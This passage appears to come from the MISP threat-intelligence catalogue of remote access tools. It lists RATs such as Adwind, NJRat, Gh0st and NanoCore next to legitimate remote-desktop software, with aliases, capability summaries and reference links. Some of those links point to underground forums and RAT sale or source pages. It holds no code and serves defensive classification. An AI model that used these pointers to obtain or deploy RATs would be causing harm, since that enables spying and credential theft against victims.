https://en.wikipedia.org/wiki/Back_Orifice_2000

https://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=10229

https://www.symantec.com/security_response/writeup.jsp?docid=2000-121814-5417-99

https://www.f-secure.com/v-descs/bo2k.shtml

RealVNC

The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another

The tag is: misp-galaxy:rat="RealVNC"

RealVNC is also known as:

  • VNC Connect

  • VNC Viewer

Table 8627. Table References

Links

https://www.realvnc.com/

Adwind RAT

Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.

The tag is: misp-galaxy:rat="Adwind RAT"

Adwind RAT is also known as:

  • UNRECOM

  • UNiversal REmote COntrol Multi-Platform

  • Frutas

  • AlienSpy

  • Unrecom

  • Jsocket

  • JBifrost

Adwind RAT has relationships with:

  • similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 8628. Table References

Links

https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf

https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml

https://blog.fortinet.com/2016/08/16/jbifrost-yet-another-incarnation-of-the-adwind-rat

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

Arcom

The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.

The tag is: misp-galaxy:rat="Arcom"

Table 8630. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99

http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/

BlackNix

BlackNix is a RAT coded in Delphi.

The tag is: misp-galaxy:rat="BlackNix"

Table 8631. Table References

Links

https://leakforums.net/thread-18123?tid=18123&&pq=1

Blue Banana

Blue Banana is a RAT (Remote Administration Tool) created purely in Java.

The tag is: misp-galaxy:rat="Blue Banana"

Table 8632. Table References

Links

https://leakforums.net/thread-123872

https://techanarchy.net/2014/02/blue-banana-rat-config/

Bozok

Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.

The tag is: misp-galaxy:rat="Bozok"

Bozok has relationships with:

  • similar: misp-galaxy:malpedia="Bozok" with estimative-language:likelihood-probability="likely"

Table 8633. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

ClientMesh

ClientMesh is a Remote Administration Application which allows a user to control a number of client PCs from around the world.

The tag is: misp-galaxy:rat="ClientMesh"

Table 8634. Table References

Links

https://sinister.ly/Thread-ClientMesh-RAT-In-Built-FUD-Crypter-Stable-DDoSer-No-PortForwading-40-Lifetime

https://blog.yakuza112.org/2012/clientmesh-rat-v5-cracked-clean/

CyberGate

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously being developed. Using CyberGate, the operator can log the victim’s passwords and also capture screenshots of the victim’s screen.

The tag is: misp-galaxy:rat="CyberGate"

CyberGate has relationships with:

  • similar: misp-galaxy:malpedia="CyberGate" with estimative-language:likelihood-probability="likely"

Table 8635. Table References

Links

http://www.hackersthirst.com/2011/03/cybergate-rat-hacking-facebook-twitter.html

http://www.nbcnews.com/id/41584097/ns/technology_and_science-security/t/cybergate-leaked-e-mails-hint-corporate-hacking-conspiracy/

Dark DDoSeR

The tag is: misp-galaxy:rat="Dark DDoSeR"

Table 8636. Table References

Links

http://meinblogzumtesten.blogspot.lu/2013/05/dark-ddoser-v56c-cracked.html

DarkRat

In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as ‘Dark RAT’ – a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.

The tag is: misp-galaxy:rat="DarkRat"

DarkRat is also known as:

  • DarkRAT

Table 8637. Table References

Links

https://www.infosecurity-magazine.com/blogs/the-dark-rat/

http://darkratphp.blogspot.lu/

Greame

The tag is: misp-galaxy:rat="Greame"

Table 8638. Table References

Links

https://sites.google.com/site/greymecompany/greame-rat-project

HawkEye

HawkEye is a popular RAT that can be used as a keylogger; it is also able to identify login events and record the destination, username, and password.

The tag is: misp-galaxy:rat="HawkEye"

Table 8639. Table References

Links

http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html

https://www.bleepingcomputer.com/news/security/zoho-heavily-used-by-keyloggers-to-transmit-stolen-data/

jRAT

jRAT is a cross-platform remote administration tool coded in Java. Because it is coded in Java, jRAT can run on all operating systems, including Windows, Mac OS X and Linux distributions.

The tag is: misp-galaxy:rat="jRAT"

jRAT is also known as:

  • JacksBot

jRAT has relationships with:

  • similar: misp-galaxy:malpedia="jRAT" with estimative-language:likelihood-probability="likely"

Table 8640. Table References

Links

https://www.rekings.com/shop/jrat/

jSpy

jSpy is a Java RAT.

The tag is: misp-galaxy:rat="jSpy"

jSpy has relationships with:

  • similar: misp-galaxy:malpedia="jSpy" with estimative-language:likelihood-probability="likely"

Table 8641. Table References

Links

https://leakforums.net/thread-479505

LuxNET

Just saying that this is a very badly coded RAT by the biggest skid in this world, XilluX. The connection is very unstable, the GUI is always flickering because of the bad multi-threading, and there are many more bugs.

The tag is: misp-galaxy:rat="LuxNET"

Table 8642. Table References

Links

https://leakforums.net/thread-284656

NJRat

NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.

The tag is: misp-galaxy:rat="NJRat"

NJRat is also known as:

  • Njw0rm

NJRat has relationships with:

  • similar: misp-galaxy:rat="Kiler RAT" with estimative-language:likelihood-probability="likely"

Table 8643. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/njrat

Pandora

Pandora is a remote administration tool developed for the Windows operating system. With advanced features and a stable structure, Pandora is based on an advanced client/server architecture and was built using modern technology.

The tag is: misp-galaxy:rat="Pandora"

Table 8644. Table References

Links

https://www.rekings.com/pandora-rat-2-2/

Predator Pain

Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved.

The tag is: misp-galaxy:rat="Predator Pain"

Predator Pain is also known as:

  • PredatorPain

Predator Pain has relationships with:

  • similar: misp-galaxy:malpedia="HawkEye Keylogger" with estimative-language:likelihood-probability="likely"

Table 8645. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-predator-pain-and-limitless.pdf

Punisher RAT

Remote administration tool.

The tag is: misp-galaxy:rat="Punisher RAT"

Table 8646. Table References

Links

http://punisher-rat.blogspot.lu/

SpyGate

SpyGate is a tool that allows you to control your computer from anywhere in the world, with full support for Unicode languages.

The tag is: misp-galaxy:rat="SpyGate"

Table 8647. Table References

Links

https://www.rekings.com/spygate-rat-3-2/

https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950

http://spygate-rat.blogspot.lu/

Small-Net

RAT

The tag is: misp-galaxy:rat="Small-Net"

Small-Net is also known as:

  • SmallNet

Table 8648. Table References

Links

http://small-net-rat.blogspot.lu/

Vantom

Vantom is a free RAT with good options and is very stable.

The tag is: misp-galaxy:rat="Vantom"

Table 8649. Table References

Links

https://www.rekings.com/vantom-rat/

Xena

Xena RAT is a fully-functional, stable, state-of-the-art RAT coded in a native language, Delphi, and it has almost no dependencies.

The tag is: misp-galaxy:rat="Xena"

Table 8650. Table References

Links

https://leakforums.net/thread-497480

XtremeRAT

This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.

The tag is: misp-galaxy:rat="XtremeRAT"

Table 8651. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

Netwire

NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.

The tag is: misp-galaxy:rat="Netwire"

Table 8652. Table References

Links

https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data

Gh0st RAT

Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into some of the most sensitive computer networks on Earth. It is a cyber spying computer program.

The tag is: misp-galaxy:rat="Gh0st RAT"

Gh0st RAT has relationships with:

  • similar: misp-galaxy:malpedia="Ghost RAT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

Table 8653. Table References

Links

https://www.volexity.com/blog/2017/03/23/have-you-been-haunted-by-the-gh0st-rat-today/

Plasma RAT

Plasma RAT’s stub is fairly advanced, having many robust features. Some of the features include botkilling, Cryptocurrencies Mining (CPU and GPU), persistence, anti-analysis, torrent seeding, AV killer, 7 DDoS methods and a keylogger. The RAT is coded in VB.Net. There is also a Botnet version of it (Plasma HTTP), which is pretty similar to the RAT version.

The tag is: misp-galaxy:rat="Plasma RAT"

Table 8654. Table References

Links

http://www.zunzutech.com/blog/security/analysis-of-plasma-rats-source-code/

Babylon

Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++, which is an ideal language for high performance, and the client is developed in C# (.NET Framework 4.5).

The tag is: misp-galaxy:rat="Babylon"

Table 8655. Table References

Links

https://www.rekings.com/babylon-rat/

Imminent Monitor

RAT

The tag is: misp-galaxy:rat="Imminent Monitor"

Table 8656. Table References

Links

http://www.imminentmethods.info/

DroidJack

DroidJack is a Java-based RAT (Remote Access Trojan/Remote Administration Tool) for remotely accessing, monitoring and managing devices running the Android mobile OS. It can be used to take complete remote control of any Android device infected with DroidJack from a PC. It comes with powerful functions and user-friendly operation, and even allows attackers to fully take over the mobile phone and steal or record the victim’s private data at will.

The tag is: misp-galaxy:rat="DroidJack"

Table 8657. Table References

Links

http://droidjack.net/

Quasar RAT

Quasar is a fast and light-weight remote administration tool coded in C#, providing high stability and an easy-to-use user interface.

The tag is: misp-galaxy:rat="Quasar RAT"

Quasar RAT has relationships with:

  • similar: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="QUASARRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="likely"

Table 8658. Table References

Links

https://github.com/quasar/QuasarRAT

https://researchcenter.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

Dendroid

Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early 2014 by Symantec and appeared in the underground for sale for $300. Some things were noted in Dendroid, such as being able to hide from emulators at the time. When first discovered in 2014 it was one of the most sophisticated Android remote administration tools known at that time. It was one of the first Trojan applications to get past Google’s Bouncer, and it led researchers to warn that creating Android malware had become easier because of it. It also seems to have followed in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appeared to be leaked somewhere around 2014. It was noted that an apk binder was included in the leak, which provided a simple way to bind Dendroid to legitimate applications.

The tag is: misp-galaxy:rat="Dendroid"

Dendroid has relationships with:

  • similar: misp-galaxy:mitre-malware="Dendroid - S0301" with estimative-language:likelihood-probability="likely"

Table 8659. Table References

Links

https://github.com/qqshow/dendroid

https://github.com/nyx0/Dendroid

Ratty

A Java RAT program.

The tag is: misp-galaxy:rat="Ratty"

Ratty has relationships with:

  • similar: misp-galaxy:malpedia="Ratty" with estimative-language:likelihood-probability="likely"

Table 8660. Table References

Links

https://github.com/shotskeber/Ratty

RaTRon

Java RAT

The tag is: misp-galaxy:rat="RaTRon"

Table 8661. Table References

Links

http://level23hacktools.com/forum/showthread.php?t=27971

https://leakforums.net/thread-405562?tid=405562&&pq=1

Arabian-Attacker RAT

The tag is: misp-galaxy:rat="Arabian-Attacker RAT"

Table 8662. Table References

Links

http://arabian-attacker.software.informer.com/

Androrat

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

The tag is: misp-galaxy:rat="Androrat"

Table 8663. Table References

Links

https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/

https://github.com/wszf/androrat

Adzok

Remote Administrator

The tag is: misp-galaxy:rat="Adzok"

Table 8664. Table References

Links

http://adzok.com/

Schwarze-Sonne-RAT

The tag is: misp-galaxy:rat="Schwarze-Sonne-RAT"

Schwarze-Sonne-RAT is also known as:

  • SS-RAT

  • Schwarze Sonne

Table 8665. Table References

Links

https://github.com/mwsrc/Schwarze-Sonne-RAT

Cyber Eye RAT

The tag is: misp-galaxy:rat="Cyber Eye RAT"

Table 8666. Table References

Links

https://www.indetectables.net/viewtopic.php?t=24245

Batch NET

The tag is: misp-galaxy:rat="Batch NET"

RWX RAT

The tag is: misp-galaxy:rat="RWX RAT"

Table 8667. Table References

Links

https://leakforums.net/thread-530663

Spynet

Spy-Net is software that allows you to control any computer in the world running the Windows operating system. It is back with new functions and good options to give you full control of your remote computer. Stable and fast, this software offers a good interface, making it easy to use all of its functions.

The tag is: misp-galaxy:rat="Spynet"

Table 8668. Table References

Links

http://spynet-rat-officiel.blogspot.lu/

CTOS

The tag is: misp-galaxy:rat="CTOS"

Table 8669. Table References

Links

https://leakforums.net/thread-559871

Virus RAT

The tag is: misp-galaxy:rat="Virus RAT"

Table 8670. Table References

Links

https://github.com/mwsrc/Virus-RAT-v8.0-Beta

Atelier Web Remote Commander

The tag is: misp-galaxy:rat="Atelier Web Remote Commander"

Table 8671. Table References

Links

http://www.atelierweb.com/products/

drat

A distributed, parallelized (Map Reduce) wrapper around Apache™ RAT to allow it to complete on large code repositories of multiple file types where Apache™ RAT hangs forev

The tag is: misp-galaxy:rat="drat"

Table 8672. Table References

Links

https://github.com/chrismattmann/drat

MoSucker

MoSucker is a powerful backdoor - hacker’s remote access tool.

The tag is: misp-galaxy:rat="MoSucker"

Table 8673. Table References

Links

https://www.f-secure.com/v-descs/mosuck.shtml

ProRat

ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).

The tag is: misp-galaxy:rat="ProRat"

Table 8675. Table References

Links

http://prorat.software.informer.com/

http://malware.wikia.com/wiki/ProRat

Setro

The tag is: misp-galaxy:rat="Setro"

Table 8676. Table References

Links

https://sites.google.com/site/greymecompany/setro-rat-project

Indetectables RAT

The tag is: misp-galaxy:rat="Indetectables RAT"

Table 8677. Table References

Links

http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html

Luminosity Link

The tag is: misp-galaxy:rat="Luminosity Link"

Table 8678. Table References

Links

https://luminosity.link/

Orcus

The tag is: misp-galaxy:rat="Orcus"

Table 8679. Table References

Links

https://orcustechnologies.com/

Blizzard

The tag is: misp-galaxy:rat="Blizzard"

Table 8680. Table References

Links

http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html

Kazybot

The tag is: misp-galaxy:rat="Kazybot"

Table 8681. Table References

Links

https://www.rekings.com/kazybot-lite-php-rat/

http://telussecuritylabs.com/threats/show/TSL20150122-06

BX

The tag is: misp-galaxy:rat="BX"

Table 8682. Table References

Links

http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html

death

The tag is: misp-galaxy:rat="death"

Sky Wyder

The tag is: misp-galaxy:rat="Sky Wyder"

Table 8683. Table References

Links

https://rubear.me/threads/sky-wyder-2016-cracked.127/

xRAT

Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote Administration Tool coded in C# (using .NET Framework 2.0).

The tag is: misp-galaxy:rat="xRAT"

xRAT has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="xrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="XRat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="likely"

Table 8685. Table References

Links

https://github.com/c4bbage/xRAT

Biodox

The tag is: misp-galaxy:rat="Biodox"

Table 8686. Table References

Links

http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html

Offence

Offense RAT is a free remote administration tool made in Delphi 9.

The tag is: misp-galaxy:rat="Offence"

Table 8687. Table References

Links

https://leakforums.net/thread-31386?tid=31386&&pq=1

Apocalypse

The tag is: misp-galaxy:rat="Apocalypse"

Apocalypse has relationships with:

  • similar: misp-galaxy:ransomware="Apocalypse" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

Table 8688. Table References

Links

https://leakforums.net/thread-36962

JCage

The tag is: misp-galaxy:rat="JCage"

Table 8689. Table References

Links

https://leakforums.net/thread-363920

Nuclear RAT

Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).

The tag is: misp-galaxy:rat="Nuclear RAT"

Table 8690. Table References

Links

http://malware.wikia.com/wiki/Nuclear_RAT

http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/

Ozone

C++ REMOTE CONTROL PROGRAM

The tag is: misp-galaxy:rat="Ozone"

Table 8691. Table References

Links

http://ozonercp.com/

Xanity

The tag is: misp-galaxy:rat="Xanity"

Table 8692. Table References

Links

https://github.com/alienwithin/xanity-php-rat

DarkMoon

The tag is: misp-galaxy:rat="DarkMoon"

DarkMoon is also known as:

  • Dark Moon

Kiler RAT

This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell, and from stealing credentials stored in browsers to accessing the victim’s webcam. Through the Command & Control (CnC) server software, the attacker can create and configure the malware to spread via physical devices, such as USB drives, and also use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well-known njrat, as they share many similar features such as their display style, several abilities and a general template for communication methods. However, where njrat left off, KilerRat has taken over. KilerRat is a very feature-rich RAT with an active development force that is rapidly gaining in popularity amongst the Middle Eastern community and the world.

The tag is: misp-galaxy:rat="Kiler RAT"

Kiler RAT is also known as:

  • Njw0rm

Kiler RAT has relationships with:

  • similar: misp-galaxy:rat="NJRat" with estimative-language:likelihood-probability="likely"

Table 8694. Table References

Links

https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off

Brat

The tag is: misp-galaxy:rat="Brat"

MINI-MO

The tag is: misp-galaxy:rat="MINI-MO"

Lost Door

Unlike most attack tools, which one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It is promoted on social media sites like YouTube and Facebook. Its maker, "OussamiO," even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT are found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.

The tag is: misp-galaxy:rat="Lost Door"

Lost Door is also known as:

  • LostDoor

Table 8695. Table References

Links

http://lost-door.blogspot.lu/

http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/lost-door-rat

Loki RAT

Loki RAT is a PHP RAT, which means no port forwarding is needed for this RAT. If you don't know how to set up this RAT, click on the tutorial.

The tag is: misp-galaxy:rat="Loki RAT"

Table 8696. Table References

Links

https://www.rekings.com/loki-rat-php-rat/

MLRat

The tag is: misp-galaxy:rat="MLRat"

Table 8697. Table References

Links

https://github.com/BahNahNah/MLRat

Pupy

Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool, mainly written in Python.

The tag is: misp-galaxy:rat="Pupy"

Pupy has relationships with:

  • similar: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="likely"

Table 8699. Table References

Links

https://github.com/n1nj4sec/pupy

Nova

Nova is a proof of concept demonstrating screen sharing over UDP hole punching.

The tag is: misp-galaxy:rat="Nova"

Table 8700. Table References

Links

http://novarat.sourceforge.net/

Turkojan

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

The tag is: misp-galaxy:rat="Turkojan"

Table 8702. Table References

Links

http://turkojan.blogspot.lu/

TINY

TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.

The tag is: misp-galaxy:rat="TINY"

Table 8703. Table References

Links

http://josh.com/tiny/

SharK

sharK is an advanced reverse-connecting, firewall-bypassing remote administration tool written in VB6. With sharK you will be able to administer every PC (running a Windows OS) remotely.

The tag is: misp-galaxy:rat="SharK"

SharK is also known as:

  • SHARK

  • Shark

SharK has relationships with:

  • similar: misp-galaxy:ransomware="Shark" with estimative-language:likelihood-probability="likely"

Table 8704. Table References

Links

https://www.security-database.com/toolswatch/SharK-3-Remote-Administration-Tool.html

http://lpc1.clpccd.cc.ca.us/lpc/mdaoud/CNT7501/NETLABS/Ethical_Hacking_Lab_05.pdf

Snowdoor

Backdoor.Snowdoor is a backdoor trojan horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5328.

The tag is: misp-galaxy:rat="Snowdoor"

Snowdoor is also known as:

  • Backdoor.Blizzard

  • Backdoor.Fxdoor

  • Backdoor.Snowdoor

  • Backdoor:Win32/Snowdoor

Table 8705. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2003-022018-5040-99

Paradox

The tag is: misp-galaxy:rat="Paradox"

Table 8706. Table References

Links

https://www.nulled.to/topic/155464-paradox-rat/

SpyNote

Android RAT

The tag is: misp-galaxy:rat="SpyNote"

SpyNote has relationships with:

  • similar: misp-galaxy:malpedia="SpyNote" with estimative-language:likelihood-probability="likely"

Table 8707. Table References

Links

https://www.rekings.com/spynote-v4-android-rat/

ZOMBIE SLAYER

The tag is: misp-galaxy:rat="ZOMBIE SLAYER"

HTTP WEB BACKDOOR

The tag is: misp-galaxy:rat="HTTP WEB BACKDOOR"

NET-MONITOR PRO

Net Monitor for Employees lets you see what everyone's doing without leaving your desk. Monitor the activity of all employees. Plus, you can share your screen with your employees' PCs, making demos and presentations much easier.

The tag is: misp-galaxy:rat="NET-MONITOR PRO"

Table 8708. Table References

Links

https://networklookout.com/help/

DameWare Mini Remote Control

Affordable remote control software for all your customer support and help desk needs.

The tag is: misp-galaxy:rat="DameWare Mini Remote Control"

DameWare Mini Remote Control is also known as:

  • dameware

Table 8709. Table References

Links

http://www.dameware.com/dameware-mini-remote-control

Remote Utilities

Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.

The tag is: misp-galaxy:rat="Remote Utilities"

Table 8710. Table References

Links

https://www.remoteutilities.com/

Ammyy Admin

Ammyy Admin is a completely portable remote access program that is extremely simple to set up. It works by connecting one computer to another via an ID supplied by the program.

The tag is: misp-galaxy:rat="Ammyy Admin"

Ammyy Admin is also known as:

  • Ammyy

Table 8711. Table References

Links

http://ammyy-admin.soft32.com/

Ultra VNC

UltraVNC works a bit like Remote Utilities: a server and a viewer are installed on two PCs, and the viewer is used to control the server.

The tag is: misp-galaxy:rat="Ultra VNC"

Table 8712. Table References

Links

http://www.uvnc.com/

AeroAdmin

AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.

The tag is: misp-galaxy:rat="AeroAdmin"

Table 8713. Table References

Links

http://www.aeroadmin.com/en/

Windows Remote Desktop

Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.

The tag is: misp-galaxy:rat="Windows Remote Desktop"

RemotePC

RemotePC, for good or bad, is a more simple free remote desktop program. You’re only allowed one connection (unless you upgrade) but for many of you, that’ll be just fine.

The tag is: misp-galaxy:rat="RemotePC"

Table 8714. Table References

Links

https://www.remotepc.com/

Seecreen

Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that’s absolutely perfect for on-demand, instant support.

The tag is: misp-galaxy:rat="Seecreen"

Seecreen is also known as:

  • Firnass

Table 8715. Table References

Links

http://seecreen.com/

Chrome Remote Desktop

Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you set up a computer for remote access from any other Chrome browser.

The tag is: misp-galaxy:rat="Chrome Remote Desktop"

Chrome Remote Desktop has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 8716. Table References

Links

https://chrome.google.com/webstore/detail/chrome-remote-desktop/gbchcmhmhahfdphkhkmpfmihenigjmpp?hl=en

AnyDesk

AnyDesk is a remote desktop program that you can run portably or install like a regular program.

The tag is: misp-galaxy:rat="AnyDesk"

Table 8717. Table References

Links

https://anydesk.com/remote-desktop

LiteManager

LiteManager is another remote access program, and it is strikingly similar to Remote Utilities. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.

The tag is: misp-galaxy:rat="LiteManager"

Table 8718. Table References

Links

http://www.litemanager.com/

Comodo Unite

Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.

The tag is: misp-galaxy:rat="Comodo Unite"

Table 8719. Table References

Links

https://www.comodo.com/home/download/download.php?prod=comodounite

ShowMyPC

ShowMyPC is a portable and free remote access program that’s nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.

The tag is: misp-galaxy:rat="ShowMyPC"

Table 8720. Table References

Links

https://showmypc.com/

join.me

join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.

The tag is: misp-galaxy:rat="join.me"

Table 8721. Table References

Links

https://www.join.me/

DesktopNow

DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.

The tag is: misp-galaxy:rat="DesktopNow"

Table 8722. Table References

Links

http://www.nchsoftware.com/remotedesktop/index.html

BeamYourScreen

Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter’s screen.

The tag is: misp-galaxy:rat="BeamYourScreen"

Table 8723. Table References

Links

http://www.beamyourscreen.com/

Casa RAT

The tag is: misp-galaxy:rat="Casa RAT"

Bandook RAT

Bandook is a FWB#++ reverse-connection RAT (Remote Administration Tool) with a small server (30 KB when packed) and a long list of features.

The tag is: misp-galaxy:rat="Bandook RAT"

Table 8724. Table References

Links

http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35NEW_/

Cerberus RAT

The tag is: misp-galaxy:rat="Cerberus RAT"

Table 8725. Table References

Links

http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html

Syndrome RAT

The tag is: misp-galaxy:rat="Syndrome RAT"

Snoopy

Snoopy is a Remote Administration Tool: software for controlling a user's computer remotely from another computer on a local network or the Internet.

The tag is: misp-galaxy:rat="Snoopy"

Table 8726. Table References

Links

http://www.spy-emergency.com/research/S/Snoopy.html

5p00f3r.N$ RAT

The tag is: misp-galaxy:rat="5p00f3r.N$ RAT"

P. Storrie RAT

The tag is: misp-galaxy:rat="P. Storrie RAT"

P. Storrie RAT is also known as:

  • P.Storrie RAT

xHacker Pro RAT

The tag is: misp-galaxy:rat="xHacker Pro RAT"

NetDevil

Backdoor.NetDevil allows a hacker to remotely control an infected computer.

The tag is: misp-galaxy:rat="NetDevil"

NetDevil has relationships with:

  • similar: misp-galaxy:rat="Net Devil" with estimative-language:likelihood-probability="likely"

Table 8727. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2002-021310-3452-99

NanoCore

In September 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end-of-day credit card transactions. This system also had the capability of connecting to the corporate network, which contained company sales reports. DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.

The tag is: misp-galaxy:rat="NanoCore"

NanoCore has relationships with:

  • similar: misp-galaxy:tool="NanoCoreRAT" with estimative-language:likelihood-probability="likely"

Table 8728. Table References

Links

https://www.digitrustgroup.com/nanocore-not-your-average-rat/

Cobian RAT

